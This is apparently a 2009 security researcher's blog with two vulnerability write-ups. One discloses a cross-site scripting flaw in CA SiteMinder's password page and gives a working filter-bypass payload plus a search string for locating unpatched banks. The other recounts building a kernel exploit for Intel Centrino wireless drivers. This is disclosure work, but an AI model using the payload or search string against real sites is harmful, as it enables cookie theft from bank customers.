Monday, July 27, 2009

Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting

CA Siteminder is a centralized Web access management system that enables user authentication and single sign-on, authentication management, policy-based authorization, identity federation and auditing of access to Web applications and portals.

During a pentest activity at the end of 2007 I met this product so I started out to analyse its html source code. The following Javascript code got my attention:

function resetCredFields()
{
    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}                                       

The value "X" is under the user control and could be used to inject arbitrary code into the resetCredFields() javascript function. Unfortunately the filters applied deny the submission of common XSS chars such as "<" or ">". At first sight it seemed to be not vulnerable to injection but after a few reasoning I deducted that a way would has been possible. A malicious Javascript code could be injected in a recursive manner into the original code. Due to the necessity to drop a part of the original code after the injection I thought to insert a code such as the following into the SMAUTHREASON parameter:

1)alert(document.cookie);}function+drop(){if(0

In this way the resulting injected code appear like the following:

function resetCredFields()
{

if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 4 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 5 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 28 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 1 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 18 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 20 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 22 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>

At the execution point of resetCredFields() function the execution of our arbitrary javascript code will be granted.

An attacker could use this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site,once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Unfortunately no remedy is available as of June 27th 2009 and several banking and financial institutions are still vulnerable to that vulnerability. Try to search the string inurl:"smpwservices.fcc" through google...the proof of the pudding.



Related links
http://www.securityfocus.com/bid/26375
http://supportconnectw.ca.com/public/antivirus/infodocs/casiteminder-secnotice.asp
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5923
http://xforce.iss.net/xforce/xfdb/38395

Saturday, May 23, 2009

Intel Centrino wireless drivers fail to properly process malformed frames

In early August of 2006 a researcher at SecureWorks said he had revealed a vulnerability in Apple's MacBook wireless software driver that would allow him to take control of the machine. While the researcher did find a vulnerability, he was using a third-party wireless driver. David Maynor and Johnny Cache demonstrated the vulnerability at the Black Hat conference on 1st August using a MacBook and an external USB plugged in wireless card .
I was looking for a way to penetrate in a protected wireless network and this method sounded good. Unfortunately there wasn't any details about the vulnerability and any publicly-available exploit. Moreover, the researchers demonstrate the vulnerability in Mac OS X and I was not sure that the bug could be exploitable in Microsoft Windows operative system.

So I decided to try to trigger the vulnerability in Microsoft Windows and to write my own exploit. A security bulletin was made public by Intel on 12th January 2007, it was INTEL-SA-00001 and looks like the following:

"Security vulnerabilities exist in the Microsoft* Windows* drivers for the Intel 2200BG and 2915ABG PRO/Wireless Network Connection Hardware because of the way that they currently handle certain frames. An attacker could potentially exploit these vulnerabilities which could potentially lead to remote code execution and system control. Security vulnerabilities have been identified in the Microsoft* Windows* drivers for the Intel 2200BG and 2915ABG PRO/Wireless Network Connection Hardware (w22n50.sys, w22n51.sys, w29n50.sys, w29n51.sys), which could potentially be exploited by attackers within range of the Wi-Fi station to execute arbitrary code on the target system with kernel-level privileges. These flaws are due to a memory corruption while parsing certain frames.".

Analyzing the driver w22n51.sys provided with the Intel 2200BG integrated wireless adapter, after a few days of work I found a way to execute a little portion of code "beep shellcode" through a stack overflow that allowed me a remote code execution in Microsoft Windows kernel mode. The stack overflow was triggered when a 802.11 Probe response frame was received with a multi vendorspecific tag and "x00" was set as essid and essid length element. After that I decided to publish a PoC exploit on milw0rm website. Unfortunately, the space I found to place the shellcode in memory was very small and the code I have been able to inject was limited to a code that reproduces a system bell.

Finally, after a few weeks of works I found a way to execute a more useful shellcode that allowed me to download and execute an executable file into the attacked machine.

After a few months of private keeping I finally disclosed the fully working exploit and published it on 17th April 2008 on milw0rm website as a metasploit framework plug in.



Related links

http://www.kb.cert.org/vuls/id/524332
http://spool.metasploit.com/pipermail/framework/2008-March/003337.html
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00001&languageid=en-fr
http://www.milw0rm.org/exploits/3158